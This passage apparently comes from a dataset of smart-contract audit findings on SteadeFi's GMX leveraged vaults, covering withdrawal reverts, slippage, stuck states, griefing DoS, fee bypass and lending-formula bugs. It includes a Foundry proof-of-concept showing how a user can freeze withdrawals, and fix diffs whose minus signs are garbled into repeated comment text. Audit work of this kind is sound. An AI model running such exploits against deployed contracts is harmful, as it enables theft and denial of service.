repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log("debtAmtTokenBBefore: %s", debtAmtTokenBBefore);\\n console.log("debtAmtTokenBAfter: %s", debtAmtTokenBAfter);\\n }\\n}\\n```\\n
User can revert processWithdraw
high
When a user wants to withdraw his tokens after depositing, the LP tokens are first sent to GMX. GMX then sends back the deposited tokens. Before the user receives them, their Vault Shares are burned in processWithdraw:\\n```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nA user could, after the LP tokens have been transferred to GMX and the Vault is waiting for the callback, transfer his Vault Shares away from his address. This would result in not having enough tokens left during the burn, causing a revert. Afterward, the Vault would be stuck in the 'Withdraw' state because, although the keeper could call the function again, it would result in revert again.\\nHere is a POC that demonstrates how a user can cause the processWithdraw to revert:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from "forge-std/Test.sol";\\nimport { TestUtils } from "../../helpers/TestUtils.sol";\\nimport { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";\\nimport { IERC20Errors } from "@openzeppelin/contracts/interfaces/draft-IERC6093.sol";\\nimport { GMXMockVaultSetup } from "./GMXMockVaultSetup.t.sol";\\nimport { GMXTypes } from "../../../contracts/strategy/gmx/GMXTypes.sol";\\nimport { GMXTestHelper } from "./GMXTestHelper.sol";\\n\\nimport { IDeposit } from "../../../contracts/interfaces/protocols/gmx/IDeposit.sol";\\nimport { IEvent } from "../../../contracts/interfaces/protocols/gmx/IEvent.sol";\\nimport { Attacker } from "./Attacker.sol";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC4() public {\\n //owner deposits\\n vm.startPrank(address(owner));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //user1 deposits\\n vm.startPrank(address(user1));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n \\n uint256 vaultSharesAmt = IERC20(address(vault)).balanceOf(address(user1)); //Vault Shares from user1 to withdraw\\n vm.startPrank(address(user1));\\n _createWithdrawal(address(USDC), vaultSharesAmt, 0, SLIPPAGE, EXECUTION_FEE); //User 1 creates a withdrawal\\n IERC20(address(vault)).transfer(address(user2), vaultSharesAmt); //Before processWithdraw is executed and the user's Vault Shares are burned, he sends them away\\n\\n vm.expectRevert(\\n abi.encodeWithSelector(IERC20Errors.ERC20InsufficientBalance.selector, address(user1), 0, vaultSharesAmt)\\n );\\n mockExchangeRouter.executeWithdrawal(address(WETH), address(USDC), address(vault), address(callback)); //executeWithdraw reverted as there are no tokens to burn\\n vm.stopPrank();\\n\\n GMXTypes.Store memory _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw)); //shows that the vault is still in the Withdraw status\\n }\\n}\\n```\\n\\nThe POC can be started with this command: `forge test --match-test test_POC4 -vv`
Tokens should be burned immediately after remove liquidity is called in GMXWithdraw.sol:\\n```\\n// Add the line below\\n 154: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n// Remove the line below\\n 197: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n
A user could put the Vault into a 'Stuck' state that can only be exited through 'emergencyPause' and 'emergencyResume.' This would take some time as 'emergencyResume' can only be called by the owner, who is a Multisig with a Timelock. (A keeper could also call 'processWithdrawCancellation,' but in this case, the debt to the lending vault would not be repaid. The tokens withdrawn by GMX would simply remain in the vault, and the user's Vault Shares would not be burned.)
```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n
Incorrect slippage protection on deposits
high
The slippage on deposits is enforced by the `minMarketTokenAmt` parameter. But in the calculation of `minMarketTokenAmt`, the slippage is factored on the user's deposit value and not the leveraged amount which is actually being deposited to GMX.\\n```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXDeposit.sol#L54-L146\\nBut vaults with leverage greater than 1 will be adding more than `_dc.depositValue` worth of liquidity in which case the calculated `minMarketTokenAmt` will result in a much higher slippage.\\nExample Scenario\\nThe vault is a 3x leveraged vault\\nUser deposits 1 usd worth tokenA and sets slippage to 1%.\\nThe `minMarketTokenAmt` calculated is worth 0.99 usd\\nThe actual deposit added is worth 3 usd due to leverage\\nThe deposit receives 2.90 worth of LP token which is more than 1% slippage
Use the actual deposit value instead of the user's initial deposit value when calculating the `minMarketTokenAmt`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXDeposit.sol b/contracts/strategy/gmx/GMXDeposit.sol\\nindex 1b28c3b..aeba68b 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXDeposit.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXDeposit.sol\\n@@ // Remove the line below\\n135,7 // Add the line below\\n135,15 @@ library GMXDeposit {\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n// Remove the line below\\n _dc.depositValue,\\n// Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenA),\\n// Add the line below\\n _alp.tokenAAmt\\n// Add the line below\\n ) // Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenB),\\n// Add the line below\\n _alp.tokenBAmt\\n// Add the line below\\n ),\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n```\\n
Depositors can loose value
```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n
incorrect handling for deposit failure leads to stuck at `deposit_failed` status .
medium
When a deposit fails, the contract can become stuck in a `deposit_failed` status due to improper handling of debt repayment by swapping through the `swapTokensForExactTokens()` function.which leads to gas losses for keeper attempting to handle that and puts user deposits at risk.\\nIn case of a user making a deposit to the `strategy`, it will create a deposit in `GMX`. After a successful deposit, `GMX` will call the callback function `afterDepositExecution`, and the callback function will call `processDeposit`.\\nIf the `processDeposit()` fails in the `try` call for any reason, the function will `catch` that and set the status to `deposit_failed`. An event will be emitted so the keeper can handle it.\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n\\nThe keeper calls the function processDepositFailure(). This function initiates a `requestWithdraw` to `GMX` to remove the liquidity added by the user deposit (+ the borrowed amount).\\nAfter executing the `removeLiquidity`, the callback function `afterWithdrawalExecution` is triggered. and since the status is `deposit_failed`, it invokes the function `processDepositFailureLiquidityWithdrawal`.\\nIn `processDepositFailureLiquidityWithdrawal`, it first checks if a swap is necessary. If required, it swaps tokens to repay the debt.\\n```\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = block.timestamp;\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n```\\n\\nThe problem arises if the swap revert if the `tokenIn` balance is insufficient to cover the `_amountOut` of `_tokenOut`, leading to a failed swap since the swap function is `swapTokensForExactTokens`. Consequently, the status remains `deposit_failed` and the callback revet.\\nNote: The swap can fail for various reasons.\\nIn this scenario, the keeper can only invoke the `processDepositFailure()` function again. During the second call, it directly triggers `processDepositFailureLiquidityWithdrawal` since the `lp` tokens for the failed deposit has already been withdrawn.\\n```\\n function processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current gmx LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n //// rest of code more code\\n }}\\n```\\n\\nThe swap will always revert because the contract's balance of `tokenIn` will never be sufficient to cover the `_amountOut` of `_tokenOut`. Consequently, the status remains stuck at `deposit_failed`.
Utilize `swapExactTokensForTokens` and swap the remaining tokens from `tokenIn` after substracting debt need to be repaid of this token.for `tokenOut`.\\nImplement safeguards to calculate the appropriate amount for swapping, avoiding potential reverting transactions. Here's an example of how to calculate the swap amount:\\n` if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n if(rp.repayTokenBAmt < self.tokenB.balanceOf(address(this))){\\n _tokenToAmt = self.tokenB.balanceOf(address(this)) - rp.repayTokenBAmt;\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n }\\n }`
The strategy remains stuck at the `deposit_failed` status, halting any further interactions with the protocol.\\nKeepers lose gas for each call to `processDepositFailure()`.\\nUsers may lose their deposits.
```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n
Missing fees allow cheap griefing attacks that lead to DoS
medium
The protocol has chosen a design pattern which does not allow two users at the same time to interact with the system as every time a user deposits or withdraws funds a 2-step process begins which interacts with GMX and only after this process is closed, another user is allowed to start a new process. This design pattern can be abused as griefing attack by front running all user calls with a small deposit, or withdraw call, to DoS the user's call. As the protocol is deployed on L2 blockchains with low transaction fees and does not take fees on depositing or withdrawing funds, this DoS griefing attack is cheap and can be scaled to a point where nobody is able to interact with the system.\\nThe design pattern of the system which leads to this possibility is the status variable.\\nThe flow for such a griefing attack would look like the following:\\nThe system's status is Open\\nUser wants to deposit or withdraw and creates a transaction to do so\\nAttacker front runs the call of the user and deposit or withdraw a small amount of funds (Systems status changes to Deposit or Withdraw)\\nUser's call gets reverted as the check if the system's status is Open reverts\\nDeposit function calls beforeDepositChecks and updates the status to Deposit:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n\\nThe beforeDepositChecks function reverts if the current status is not Open:\\n```\\nfunction beforeDepositChecks(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n) external view {\\n if (self.status != GMXTypes.Status.Open)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nThe same pattern is implemented in the withdraw flow.
Implement fees, for depositing and withdrawing, to increase the costs of such a griefing attack, or rethink the status architecture.
DoS of the whole system for all depositors.
```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n
Yield in trove is lost when closing a strategy vault
high
The funds in the trove contract are not claimed during the emergency close flow and can not be claimed in a normal way during this situation, because of a status change. Therefore, all the acquired yield will be lost.\\nWhen users deposit, or withdraw tokens, all acquired yield from GMX is sent to the trove contract:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\n```\\nfunction withdraw(\\n GMXTypes.Store storage self,\\n GMXTypes.WithdrawParams memory wp\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of withdrawers assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n\\nThe only way in the system to claim these yield is the compound function, which calls the beforeCompoundChecks function:\\n```\\nfunction compound(\\n GMXTypes.Store storage self,\\n GMXTypes.CompoundParams memory cp\\n) external {\\n // Transfer any tokenA/B from trove to vault\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenA.balanceOf(address(self.trove))\\n );\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(\\n address(self.trove),\\n address(this),\\n self.tokenB.balanceOf(address(self.trove))\\n );\\n }\\n // rest of code\\n GMXChecks.beforeCompoundChecks(self);\\n // rest of code\\n}\\n```\\n\\nThis function reverts if the current status of the system is not Open or Compound_Failed:\\n```\\nfunction beforeCompoundChecks(\\n GMXTypes.Store storage self\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Compound_Failed\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nAs the emergency close flow updates this status to Paused and later to Closed, calling compound will revert:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\n```\\nfunction emergencyClose(\\n GMXTypes.Store storage self,\\n uint256 deadline\\n) external {\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n ) = GMXManager.calcRepay(self, 1e18);\\n\\n (\\n bool _swapNeeded,\\n address _tokenFrom,\\n address _tokenTo,\\n uint256 _tokenToAmt\\n ) = GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n\\n GMXManager.repay(\\n self,\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(\\n _rp.repayTokenAAmt,\\n _rp.repayTokenBAmt\\n );\\n}\\n```\\n\\nAnd as we can see during these process the funds inside the trove contract are never claimed and as the strategy vault is the only address that can claim the funds of the trove, all funds are gone.\\n```\\ncontract GMXTrove {\\n\\n /* ==================== STATE VARIABLES ==================== */\\n\\n // Address of the vault this trove handler is for\\n IGMXVault public vault;\\n\\n /* ====================== CONSTRUCTOR ====================== */\\n\\n /**\\n * @notice Initialize trove contract with associated vault address\\n * @param _vault Address of vault\\n */\\n constructor (address _vault) {\\n vault = IGMXVault(_vault);\\n\\n GMXTypes.Store memory _store = vault.store();\\n\\n // Set token approvals for this trove's vault contract\\n _store.tokenA.approve(address(vault), type(uint256).max);\\n _store.tokenB.approve(address(vault), type(uint256).max);\\n }\\n}\\n```\\n
Transfer the funds inside the trove into the vault during the emergency close process.
If a strategy vault is closed, all funds in the trove are lost.
```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n // rest of code\\n}\\n```\\n
emergencyResume does not handle the afterDepositCancellation case correctly
medium
The `emergencyResume` function is intended to recover the vault's liquidity following an `emergencyPause`. It operates under the assumption of a successful deposit call. However, if the deposit call is cancelled by GMX, the `emergencyResume` function does not account for this scenario, potentially locking funds.\\nWhen `emergencyResume` is invoked, it sets the vault's status to "Resume" and deposits all LP tokens back into the pool. The function is designed to execute when the vault status is "Paused" and can be triggered by an approved keeper.\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nShould the deposit fail, the callback contract's `afterDepositCancellation` is expected to revert, which does not impact the continuation of the GMX execution. After the cancellation occurs, the vault status is "Resume", and the liquidity is not re-added to the pool.\\n```\\nfunction afterDepositCancellation(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (_store.status == GMXTypes.Status.Deposit) {\\n if (_store.depositCache.depositKey == depositKey)\\n vault.processDepositCancellation();\\n } else if (_store.status == GMXTypes.Status.Rebalance_Add) {\\n if (_store.rebalanceCache.depositKey == depositKey)\\n vault.processRebalanceAddCancellation();\\n } else if (_store.status == GMXTypes.Status.Compound) {\\n if (_store.compoundCache.depositKey == depositKey)\\n vault.processCompoundCancellation();\\n } else {\\n revert Errors.DepositCancellationCallback();\\n }\\n }\\n```\\n\\nGiven this, another attempt to execute `emergencyResume` will fail because the vault status is not "Paused".\\n```\\nfunction beforeEmergencyResumeChecks (\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Paused)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\n\\nIn this state, an attempt to revert to "Paused" status via `emergencyPause` could fail in GMXManager.removeLiquidity, as there are no tokens to send back to the GMX pool, leading to a potential fund lock within the contract.
To address this issue, handle the afterDepositCancellation case correctly by allowing emergencyResume to be called again.
The current implementation may result in funds being irretrievably locked within the contract.
```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n
A depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.
medium
The fee-minted in the form of shares (svTokens) would not be subtracted from the amount of shares (svTokens) to be minted to the GMXVault's depositor.\\nDue to that, a depositor of the GMXVault could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.\\nWithin the GMXDeposit#deposit(), the GMXVault#mintFee() would be called to mint the fee in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L119\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXVault#mintFee(), the amount (GMXReader.pendingFee(_store)) of the shares would be minted to the treasury (_store.treasury) in the form of the svTokens like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXVault.sol#L335\\n```\\n /**\\n * @notice Mint vault token shares as management fees to protocol treasury\\n */\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store)); ///<------------ @audit\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhen callback of deposit, the the GMXDeposit#processDeposit() would be called via the GMXVault#deposit().\\nWithin the GMXDeposit#processDeposit(), the amount (self.depositCache.sharesToUser) of shares (VaultTokens) would be minted to the GMXVault's depositor (self.depositCache.user) like this: https://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXDeposit.sol#L172\\n```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n */\\n function processDeposit(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeProcessDepositChecks(self);\\n\\n // We transfer the core logic of this function to GMXProcessDeposit.processDeposit()\\n // to allow try/catch here to catch for any issues or any checks in afterDepositChecks() failing.\\n // If there are any issues, a DepositFailed event will be emitted and processDepositFailure()\\n // should be triggered to refund assets accordingly and reset the vault status to Open again.\\n try GMXProcessDeposit.processDeposit(self) {\\n // Mint shares to depositor\\n self.vault.mint(self.depositCache.user, self.depositCache.sharesToUser); ///<------------- @audit\\n // rest of code\\n```\\n\\nWithin the GMXDeposit#processDeposit() above, the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() is supposed to be subtracted from the amount of the shares to be minted to the GMXVault's depositor via the GMXDeposit#processDeposit().\\nHowever, there is no logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().
Within the GMXDeposit#processDeposit(), consider adding a logic to subtract the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() from the amount of the shares to be minted to the GMXVault's depositor in the form of the shares (svTokens) via the GMXDeposit#processDeposit().
The depositor could receive the amount of the shares (svTokens), which the amount of the fee-minted in the form of the shares (svTokens) via the GMXDeposit#mintFee() was not subtracted.\\nThis means that a depositor of the GMXVault can bypass paying the fee when the depositor deposit into the GMXVault.
```\\n /**\\n * @notice @inheritdoc GMXVault\\n * @param self GMXTypes.Store\\n * @param isNative Boolean as to whether user is depositing native asset (e.g. ETH, AVAX, etc.)\\n */\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n // rest of code\\n self.status = GMXTypes.Status.Deposit;\\n\\n self.vault.mintFee(); ///<----------------------- @audit\\n // rest of code\\n```\\n
Incorrect depositable shortToken amount calculation in Delta neutral vaults
medium
When calculating the maximum possible depositable amount for delta neutral vaults, `_maxTokenBLending` is calculated incorrectly.\\n```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXReader.sol#L254-L270\\nIf `a` user wants to deposit `v` value to `a` `l` leveraged delta neutral vault with token weights `a` and `b`, the calculation of required lending amount would be as follows:\\n```\\nTotal value to deposit to GMX = lv\\nValue of tokens to short = lva\\nHence this value will be borrowed from the tokenA lending vault\\nRemaining value to borrow (from tokenB lending vault) = lv - lva - v (deposit value provided by user)\\nHence if there is Tb value of tokens in tokenB lending vault, v <= Tb / (l - la - 1)\\n```\\n
Change the formula to the correct one.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXReader.sol b/contracts/strategy/gmx/GMXReader.sol\\nindex 73bb111..ae819c4 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXReader.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXReader.sol\\n@@ // Remove the line below\\n266,8 // Add the line below\\n266,7 @@ library GMXReader {\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n// Remove the line below\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n// Remove the line below\\n // Remove the line below\\n 1e18;\\n// Add the line below\\n / (self.leverage // Remove the line below\\n (self.leverage *_tokenAWeight / SAFE_MULTIPLIER) // Remove the line below\\n 1e18);\\n \\n _additionalCapacity = _maxTokenALending > _maxTokenBLending ? _maxTokenBLending : _maxTokenALending;\\n }\\n```\\n
Deposit attempts can revert even when there is enough tokens to lend causing inefficiency, loss of gas for depositors and deviation from the protocol specification.
```\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n (uint256 _tokenAWeight, ) = tokenWeights(self);\\n\\n\\n uint256 _maxTokenALending = convertToUsdValue(\\n self,\\n address(self.tokenA),\\n self.tokenALendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER);\\n\\n\\n uint256 _maxTokenBLending = convertToUsdValue(\\n self,\\n address(self.tokenB),\\n self.tokenBLendingVault.totalAvailableAsset()\\n ) * SAFE_MULTIPLIER\\n / (self.leverage * _tokenAWeight / SAFE_MULTIPLIER)\\n - 1e18;\\n```\\n
GMXOracle.sol#L280: function `getLpTokenAmount` icorrectly assumes that the returned price is in 18 decimal places. But it is 30 decimal places.
low
